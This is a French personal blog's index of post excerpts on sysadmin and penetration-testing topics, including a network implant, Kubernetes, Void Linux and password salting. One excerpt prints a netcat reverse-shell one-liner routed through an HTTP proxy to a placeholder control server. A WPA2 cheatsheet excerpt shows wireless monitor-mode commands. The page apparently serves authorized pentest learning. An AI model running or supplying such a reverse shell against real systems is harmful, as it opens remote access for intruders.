Configuration d'un implant réseau sous OpenWRT

Posted on sam. 20 février 2021 in tuto • Tagged with infosec, tuto, tools, vpn, sysadmin, pentest

Un outil courant lors d'audits d'intrusion est l'implant réseau : il s'agit d'un petit appareil que l'on va déposer chez la cible et raccorder à son réseau, et qui va nous permettre d'y accéder via une connexion distante, le tout à l'aide d'un tunnel sécurisé. S'il existe des solutions commerciales comme …


Continue reading

Installation d'un cluster Kubernetes avec kubeadm et flannel

Posted on dim. 09 août 2020 in tuto • Tagged with lab, k8s, virtualisation, tuto

Pour différentes raisons, je me suis mis récemment à jouer un peu plus qu'avant avec les conteneurs.

À titre perso, je ne me vois pas quitter la virtualisation classique sur mon infra, j'aime bien l'aspect sécurité apporté par le cloisonnement des différentes machines. Pour autant, j'ai déjà utilisé Docker et …


Continue reading

Cheatsheet : WPA2-PSK

Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack

Disclaimer

N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.

Mode monitoring

  • Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
  • Activer le mode monitoring sur l'interface :
airmon-ng start wlan0

L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …


Continue reading

Post-it : Reverse shell à travers un proxy HTTP

Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation

Obtenir un reverse shell :

  • via netcat
  • sans droits root
  • en traversant un proxy HTTP
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …

Continue reading

DNSPython : la boite à outil du DNS en python

Posted on ven. 19 avril 2019 in tuto • Tagged with python, dns

DNSPython est un module qui permet de forger et d'envoyer des requêtes DNS, des plus classiques aux plus complexes. Des fonctions de haut niveau vont permettre d'effectuer des requêtes courantes très simplement, et des fonctions de bas niveau permettant de créer sa requête pour prendre en compte les cas les …


Continue reading

Installation de Void Linux : Full disk encryption, dualboot et UEFI

Posted on ven. 05 avril 2019 in tuto • Tagged with linux, void, install

Je viens de changer de laptop, et qui dit nouveau laptop, dit nouvelle installation de Linux !

Je reste fidèle à Void Linux que j'utilisais déjà sur mon précédent ordinateur, mais j'ai décidé de conserver le Windows en dual boot au cas où. Donc les caractéristiques de l'installation :

  • Dualboot Windows / Linux …

Continue reading

Modifier la taille de la police du TTY pour les écrans HiDPI

Posted on mer. 27 mars 2019 in post-it • Tagged with linux, astuce

Hello !

Aujourd'hui petite astuce en passant : je viens d'acheter un nouveau PC avec un magnifique écran HiDPI (écran de taille petite ou moyenne avec une très grande résolution). Ce qui est très beau, mais l'installation de Void Linux se faisant via un terminal, les caractères sont ridiculement petits.

Pas de …


Continue reading

Création d'un lab de pentest à la maison

Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab

Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …


Continue reading

Encore plus de vim-fu : Gestion des buffers, fenêtres et onglets sous vim (vim-fu partie 2 !)

Posted on dim. 18 février 2018 in tuto • Tagged with vim, linux, sysadmin

Trois ans après un premier tuto sur les bases de vim et deux ans après un tuto sur les fonctionnalités avancées, on est repartis pour toujours plus d'astuces pour vim ! (oui, mon rythme de publication ne ressemble à rien...) Du coup, aujourd'hui, on va voir comment vim gère les fichiers …


Continue reading

Stockage de mots de passe : le sel c'est bon pour le coeur

Posted on mer. 18 janvier 2017 in vrac • Tagged with password, dropbox, infosec, chiffrement

On entend parler régulièrement de fuites de données, en particulier de mots de passe. Le problème est assez important, puisqu'on sait tous que la majorité des gens réutilisent leurs mots de passe sur différents services. Du coup, il ne faut JAMAIS stocker des mots de passe en clair dans une …


Continue reading